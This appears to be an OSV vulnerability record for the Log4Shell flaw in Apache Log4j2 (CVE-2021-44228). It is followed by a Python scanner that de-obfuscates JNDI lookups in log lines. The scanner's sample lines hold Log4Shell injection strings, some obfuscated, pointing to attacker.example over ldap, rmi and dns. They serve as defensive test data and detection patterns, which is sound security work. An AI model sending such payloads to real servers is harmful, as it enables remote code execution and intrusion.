{
  "id": "CVE-2021-44228",
  "details": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.",
  "aliases": ["GHSA-jfh8-c2jp-5v3q"],
  "modified": "2026-02-24T11:47:18.559348Z",
  "published": "2021-12-10T10:15:09.143Z",
  "related": [
    "MGASA-2021-0556",
    "SUSE-SU-2021:4096-1",
    "SUSE-SU-2021:4097-1",
    "openSUSE-SU-2021:1577-1",
    "openSUSE-SU-2021:1586-1",
    "openSUSE-SU-2021:1601-1",
    "openSUSE-SU-2021:1613-1",
    "openSUSE-SU-2021:3999-1",
    "openSUSE-SU-2021:4094-1",
    "openSUSE-SU-2021:4107-1",
    "openSUSE-SU-2021:4109-1",
    "openSUSE-SU-2024:11666-1",
    "openSUSE-SU-2024:11683-1"
  ],
  "references": [
    {"type": "WEB", "url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"},
    {"type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"},
    {"type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"},
    {"type": "WEB", "url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md"},
    {"type": "WEB", "url": "https://twitter.com/kurtseifried/status/1469345530182455296"},
    {"type": "WEB", "url": "https://www.kb.cert.org/vuls/id/930724"},
    {"type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-44228"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"},
    {"type": "ADVISORY", "url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"},
    {"type": "ADVISORY", "url": "http://seclists.org/fulldisclosure/2022/Dec/2"},
    {"type": "ADVISORY", "url": "http://seclists.org/fulldisclosure/2022/Jul/11"},
    {"type": "ADVISORY", "url": "http://seclists.org/fulldisclosure/2022/Mar/23"},
    {"type": "ADVISORY", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"},
    {"type": "ADVISORY", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"},
    {"type": "ADVISORY", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"},
    {"type": "ADVISORY", "url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"},
    {"type": "ADVISORY", "url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"},
    {"type": "ADVISORY", "url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"},
    {"type": "ADVISORY", "url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"},
    {"type": "ADVISORY", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"},
    {"type": "ADVISORY", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},
    {"type": "ADVISORY", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"},
    {"type": "ADVISORY", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"},
    {"type": "ADVISORY", "url": "https://github.com/cisagov/log4j-affected-db"},
    {"type": "ADVISORY", "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"},
    {"type": "ADVISORY", "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"},
    {"type": "ADVISORY", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/"},
    {"type": "ADVISORY", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/"},
    {"type": "ADVISORY", "url": "https://logging.apache.org/log4j/2.x/security.html"},
    {"type": "ADVISORY", "url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"},
    {"type": "ADVISORY", "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},
    {"type": "ADVISORY", "url": "https://security.netapp.com/advisory/ntap-20211210-0007/"},
    {"type": "ADVISORY", "url": "https://support.apple.com/kb/HT213189"},
    {"type": "ADVISORY", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},
    {"type": "ADVISORY", "url": "https://twitter.com/kurtseifried/status/1469345530182455296"},
    {"type": "ADVISORY", "url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"},
    {"type": "ADVISORY", "url": "https://www.debian.org/security/2021/dsa-5020"},
    {"type": "ADVISORY", "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"},
    {"type": "ADVISORY", "url": "https://www.kb.cert.org/vuls/id/930724"},
    {"type": "ADVISORY", "url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"},
    {"type": "ADVISORY", "url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"},
    {"type": "ADVISORY", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"},
    {"type": "ADVISORY", "url": "https://www.oracle.com/security-alerts/cpujan2022.html"},
    {"type": "ADVISORY", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-44228"},
    {"type": "FIX", "url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"},
    {"type": "FIX", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"},
    {"type": "FIX", "url": "https://www.oracle.com/security-alerts/cpujan2022.html"},
    {"type": "ARTICLE", "url": "http://seclists.org/fulldisclosure/2022/Dec/2"},
    {"type": "ARTICLE", "url": "http://seclists.org/fulldisclosure/2022/Jul/11"},
    {"type": "ARTICLE", "url": "http://seclists.org/fulldisclosure/2022/Mar/23"},
    {"type": "ARTICLE", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"},
    {"type": "ARTICLE", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"},
    {"type": "ARTICLE", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"},
    {"type": "ARTICLE", "url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"},
    {"type": "ARTICLE", "url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"},
    {"type": "ARTICLE", "url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"},
    {"type": "ARTICLE", "url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"},
    {"type": "ARTICLE", "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"},
    {"type": "ARTICLE", "url": "https://www.debian.org/security/2021/dsa-5020"},
    {"type": "EVIDENCE", "url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"},
    {"type": "EVIDENCE", "url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},
    {"type": "EVIDENCE", "url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"},
    {"type": "EVIDENCE", "url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"},
    {"type": "EVIDENCE", "url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"},
    {"type": "EVIDENCE", "url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"},
    {"type": "EVIDENCE", "url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"},
    {"type": "EVIDENCE", "url": "http://seclists.org/fulldisclosure/2022/Dec/2"},
    {"type": "EVIDENCE", "url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"},
    {"type": "EVIDENCE", "url": "https://twitter.com/kurtseifried/status/1469345530182455296"},
    {"type": "EVIDENCE", "url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"}
  ],
  "affected": [
    {
      "package": {"ecosystem": "Maven", "name": "org.apache.logging.log4j:log4j-core"},
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {"introduced": "2.0-beta9"},
            {"fixed": "2.3.1"},
            {"introduced": "2.4"},
            {"fixed": "2.12.2"},
            {"introduced": "2.13.0"},
            {"fixed": "2.16.0"}
          ]
        }
      ],
      "database_specific": {"source": "https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2021-44228.json"}
    }
  ],
  "schema_version": "1.7.3",
  "severity": [
    {"type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}
  ]
}
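The details field above describes the trigger: a `${jndi:...}` lookup reaching log4j-core through attacker-controlled message text or parameters, which the logger then resolves against an LDAP (or RMI, DNS, ...) endpoint. In the wild the literal string `jndi` is rarely sent as-is; it is assembled from nested lookups such as `${lower:j}`, `${::-j}` and `${env:NOTSET:-j}` so that naive substring matches miss it. The following is an added example, not part of the OSV record and not Apache's code: a small Python scanner that peels off those nesting tricks and reports the JNDI scheme in each hit. It runs over constructed access-log lines embedded in the block; the attacker.example hostnames, the log format and the three obfuscation forms it evaluates are assumptions for illustration, and its normalizer is a deliberately narrow approximation of Log4j's lookup evaluation, not a reimplementation of it.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not taken from the OSV record or any real incident).
# Lines 0-3 carry a JNDI lookup in the User-Agent field with increasing obfuscation;
# lines 4-5 are benign, the last one holding a non-JNDI lookup that must not alert.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NOTSET:-j}ndi:${upper:dns}://attacker.example/c}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.10 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 "-" "${date:yyyy}"',
]

# An innermost lookup: "${...}" whose body contains no further "${" or "}".
_LEAF = re.compile(r"\$\{([^${}]*)\}")
# What we are really looking for once the obfuscation is peeled off: "${jndi:<scheme>:".
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def _resolve_leaf(body: str) -> Optional[str]:
    """Evaluate the three lookup forms attackers use to spell 'jndi' piecewise.

    Assumption: only lower:, upper: and the ':-default' fallback are evaluated.
    Anything else (jndi:, date:, ctx:, ...) is returned as None so it stays in
    the text for the caller to inspect.
    """
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    # "${::-j}" and "${env:NOTSET:-j}": a lookup that cannot resolve collapses to its default.
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Rewrite innermost resolvable lookups until the text stops changing (bounded)."""
    def _sub(m: "re.Match") -> str:
        resolved = _resolve_leaf(m.group(1))
        return m.group(0) if resolved is None else resolved

    for _ in range(max_rounds):
        rewritten = _LEAF.sub(_sub, text)
        if rewritten == text:
            break
        text = rewritten
    return text


def find_jndi(line: str) -> List[Tuple[str, str]]:
    """Return (scheme, normalized lookup) pairs for every JNDI lookup in one log line."""
    normalized = normalize_lookups(line)
    hits = []
    for m in _JNDI.finditer(normalized):
        close = normalized.find("}", m.end())
        end = len(normalized) if close == -1 else close + 1
        hits.append((m.group(1).lower(), normalized[m.start():end]))
    return hits


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan many lines; each finding is (line index, jndi scheme, de-obfuscated lookup)."""
    findings = []
    for idx, line in enumerate(lines):
        for scheme, payload in find_jndi(line):
            findings.append((idx, scheme, payload))
    return findings


if __name__ == "__main__":
    for idx, scheme, payload in scan(SAMPLE_LINES):
        print(f"line {idx}: jndi scheme={scheme} payload={payload}")
```

Running it reports lines 0 to 3 with schemes ldap, ldap, rmi and dns, and nothing for the benign lines. Because the normalizer evaluates lookups innermost-first, the same routine handles arbitrarily deep nesting of the three forms it knows; a fixed round limit keeps a pathological line from looping. The scheme is worth surfacing because it tells the responder which outbound connection to look for in firewall or DNS logs.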